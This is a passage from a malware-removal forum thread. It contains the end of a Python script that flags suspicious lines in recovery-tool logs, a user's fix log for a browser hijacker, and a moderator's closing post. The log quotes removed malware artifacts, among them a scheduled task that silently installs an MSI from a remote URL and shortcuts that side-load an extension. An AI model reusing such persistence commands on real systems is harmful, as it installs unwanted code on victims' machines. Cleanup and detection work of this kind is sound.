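    findings = []
    kind, _, rest = line.partition(":")
    kind, rest = kind.strip(), rest.strip()

    if kind == "ShortcutWithArgument":
        # <lnk path> -> <target exe> (<company>) -> <arguments>
        parts = rest.split(" -> ", 2)
        args = parts[2] if len(parts) == 3 else ""
        if "--load-extension" in args:
            findings.append("load-extension")   # side-loads an unpacked extension
        if URL_RE.search(args):
            findings.append("forced-url")       # browser always opens this page
    elif kind == "Shortcut":
        lnk_path = rest.split(" -> ", 1)[0]
        file_name = lnk_path.rsplit("\\", 1)[-1]
        if len(scripts_in(file_name)) > 1:
            findings.append("mixed-script-name")  # e.g. Latin mixed with Cyrillic
    elif kind == "Task":
        # {GUID} - <task file> => <command line>
        command = rest.partition(" => ")[2]
        lowered = command.lower().lstrip('"')
        if "msiexec" in lowered and URL_RE.search(command):
            findings.append("remote-msi-task")    # installs an MSI fetched from a URL
        if lowered.startswith("pcalua.exe"):
            findings.append("pcalua-launch-task")  # program started via pcalua.exe
    elif kind == "AlternateDataStreams":
        match = ADS_RE.match(rest)
        if match:
            findings.append("ads")
            if match.group("stream").lower().endswith(EXEC_EXT):
                findings.append("ads-executable-name")
    return findings


def triage(lines):
    """Map line index -> finding codes, keeping only lines with findings."""
    report = {}
    for index, line in enumerate(lines):
        found = triage_line(line)
        if found:
            report[index] = found
    return report


if __name__ == "__main__":
    for index, found in triage(SAMPLE_LINES).items():
        print(f"line {index}: {', '.join(found)}")
```

      Removing only the start URL from a flagged shortcut is not enough when `load-extension` is also reported: the folder named in that argument has to be checked as well.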

    8. #8
      User: Darkor
      Registered: Oct 2006
      Location: Spain
      Posts: 9

      Re: Remove qtipr.com

      It's solved now. Thank you very much for the help.

      Fix result of Farbar Recovery Scan Tool (x64) Version: 18-02-2017 01
      Ran by Alberto (18-02-2017 16:32:43) Run:1
      Running from C:\Users\Alberto\Desktop
      Loaded Profiles: Alberto (Available Profiles: Alberto)
      Boot Mode: Normal
      ==============================================

      fixlist content:
      *****************
      Start
      CreateRestorePoint:
      CloseProcesses:

      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\Run: [Chromium] => "c:\users\alberto\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
      ShellExecuteHooks: No Name - {F294D2AE-ECCF-11E6-85D5-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Bserpy\Phasother.dll -> No File
      ShellExecuteHooks: No Name - {0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} - C:\Users\Alberto\AppData\Roaming\Thugagh\Acgemaguty.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      U3 ucdrv; no ImagePath
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&amp;v=201729 /q
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Int?rn?t ???l?r?r.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

      CMD: ipconfig /flushdns
      CMD: ipconfig /renew
      CMD: bitsadmin /reset /allusers
      RemoveProxy:
      EmptyTemp:
      Hosts:
      end
      *****************

      Restore point was successfully created.
      Processes closed successfully.
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => value removed successfully
      HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => value removed successfully
      HKCR\CLSID\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} => value removed successfully
      HKCR\CLSID\{0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => invalid subkey removed.
      HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => invalid subkey removed.
      HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => invalid subkey removed.
      HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj => key removed successfully
      HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
      C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
      C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
      HKLM\SOFTWARE\Policies\Google => key removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} => key removed successfully
      HKCR\CLSID\{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} => key not found.
      Firefox "homepage" removed successfully
      C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi => moved successfully
      C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi => moved successfully
      HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer => key removed successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => moved successfully
      HKLM\System\CurrentControlSet\Services\ucdrv => key removed successfully
      ucdrv => service removed successfully
      C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => moved successfully
      C:\ProgramData\Avira => moved successfully
      C:\ProgramData\Avg => moved successfully
      C:\ProgramData\AVAST Software => moved successfully
      C:\Users\Alberto\AppData\Roaming\Thugagh => moved successfully
      C:\Users\Alberto\AppData\Local\Zicsythifetain => moved successfully
      C:\WINDOWS\System32\Tasks\Erwushprazase Configuration => moved successfully
      C:\WINDOWS\System32\Tasks\Chevuge => moved successfully
      C:\Users\Alberto\AppData\Local\Zujerle => moved successfully
      C:\Users\Alberto\AppData\Local\UCBrowser => moved successfully
      C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe => moved successfully
      C:\Users\Alberto\AppData\Roaming\uTorrent => moved successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8FEB47DB-6AF4-43E4-82EC-A450E7786342} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FEB47DB-6AF4-43E4-82EC-A450E7786342} => key removed successfully
      C:\WINDOWS\System32\Tasks\Erwushprazase Configuration => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Erwushprazase Configuration => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D6B27619-ED57-41A6-B563-28F9588E867B} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D6B27619-ED57-41A6-B563-28F9588E867B} => key removed successfully
      C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{BEFD2162-C6CF-488F-8778-A79BA873E300} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EF46272C-91A2-4AE7-B9FD-68453CF46DD7} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF46272C-91A2-4AE7-B9FD-68453CF46DD7} => key removed successfully
      C:\WINDOWS\System32\Tasks\Chevuge => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chevuge => key removed successfully
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION => removed successfully
      "C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Int?rn?t ???l?r?r.lnk" => Could not move.
      C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Windows => ":nlsPreferences" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":ucdrv-x64.sys" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":x64" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":x86" ADS removed successfully.
      C:\Users\Alberto\Configuración local => ":k7RtSr3u5tYnlX2Bwkwx" ADS removed successfully.
      C:\Users\Alberto\Configuración local => ":Lmb9BqubakMCfIXhy" ADS removed successfully.
      "C:\Users\Alberto\AppData\Local" => ":k7RtSr3u5tYnlX2Bwkwx" ADS not found.
      "C:\Users\Alberto\AppData\Local" => ":Lmb9BqubakMCfIXhy" ADS not found.
      C:\Users\Alberto\AppData\Local\Archivos temporales de Internet => ":G7RosvZLTjKjBQvoMJUig" ADS removed successfully.
      "C:\Users\Alberto\AppData\Local\Datos de programa" => ":k7RtSr3u5tYnlX2Bwkwx" ADS not found.
      "C:\Users\Alberto\AppData\Local\Datos de programa" => ":Lmb9BqubakMCfIXhy" ADS not found.
      C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`27hfm" ADS removed successfully.

      ========= ipconfig /flushdns =========


      Configuración IP de Windows

      Se vació correctamente la caché de resolución de DNS.

      ========= End of CMD: =========


      ========= ipconfig /renew =========


      Configuración IP de Windows

      No se puede realizar ninguna operación en Conexión de red Bluetooth 3 mientras los medios
      están desconectados.
      No se puede realizar ninguna operación en Conexión de área local* 4 mientras los medios
      están desconectados.
      No se puede realizar ninguna operación en Conexión de área local* 2 mientras los medios
      están desconectados.
      No se puede realizar ninguna operación en Ethernet mientras los medios
      están desconectados.

      Adaptador de Ethernet Conexión de red Bluetooth 3:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS específico para la conexión. . :

      Adaptador de LAN inalámbrica Conexión de área local* 4:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS específico para la conexión. . :

      Adaptador de LAN inalámbrica Conexión de área local* 2:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS específico para la conexión. . :

      Adaptador de LAN inalámbrica Wi-Fi:

      Sufijo DNS específico para la conexión. . :
      Vínculo: dirección IPv6 local. . . : fe80::8459:1194:32a4:ebd5%5
      Dirección IPv4. . . . . . . . . . . . . . : 192.168.1.3
      Máscara de subred . . . . . . . . . . . . : 255.255.255.0
      Puerta de enlace predeterminada . . . . . : 192.168.1.1

      Adaptador de Ethernet Ethernet:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS específico para la conexión. . : medusa.gobiernodecanarias.net

      Adaptador de túnel isatap.{CD4BB8C7-8D07-490D-A1EF-88B67DEA2363}:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS específico para la conexión. . :

      ========= End of CMD: =========


      ========= bitsadmin /reset /allusers =========


      BITSADMIN version 3.0 [ 7.7.9600 ]
      BITS administration utility.
      (C) Copyright 2000-2006 Microsoft Corp.

      BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
      Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

      {81F1D534-C545-40E2-854F-EA85CD90BCF4} canceled.
      {779AE08A-CAF5-407D-AE25-FEB06847D1BD} canceled.
      {9C472B33-F7EC-4358-ADCD-EF9A9695E01B} canceled.
      {78DFB215-A980-47A0-B42E-BD014D8332E3} canceled.
      4 out of 4 jobs canceled.

      ========= End of CMD: =========


      ========= RemoveProxy: =========

      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


      ========= End of RemoveProxy: =========

      C:\Windows\System32\Drivers\etc\hosts => moved successfully
      Hosts restored successfully.

      =========== EmptyTemp: ==========

      BITS transfer queue => 8388608 B
      DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 44897433 B
      Java, Flash, Steam htmlcache => 761 B
      Windows/system/drivers => 158009954 B
      Edge => 0 B
      Chrome => 16631808 B
      Firefox => 29592538 B
      Opera => 0 B

      Temp, IE cache, history, cookies, recent:
      Default => 0 B
      Users => 0 B
      ProgramData => 0 B
      Public => 0 B
      systemprofile => 1959245 B
      systemprofile32 => 128 B
      LocalService => 23106 B
      NetworkService => 5701632 B
      UpdatusUser => 0 B
      Alberto => 83513822810 B

      RecycleBin => 5007524 B
      EmptyTemp: => 78 GB temporary data Removed.

      ================================


      The system needed a reboot.

      ==== End of Fixlog 17:03:25 ====

    9. #9
      General Moderator: @Daniela
      Registered: Apr 2011
      Location: Spain
      Posts: 23,121

      Re: Remove qtipr.com

      Hi Darkor

      Follow these steps to remove the tools that were used:

      • Use >> Download >> DelFix again
        • Double-click to run it. (If you use Windows Vista/7 or 8, right-click and select "Run as administrator".)
        • Check all the boxes.
      • Click Run.

        The report (DelFix.txt) will open; check that the tools used have been removed.


      Thank you for trusting ForoSpyware. It has been a pleasure to help you.

      We are glad it has been resolved. We consider this topic solved.


      If you want to REOPEN THIS TOPIC, click to report it: How to report posts?

      As a final recommendation, we invite you to follow us on our channels (Blog, Twitter, Facebook) to stay up to date on new malware and how to prevent it.
      *** Topic solved ***


      Regards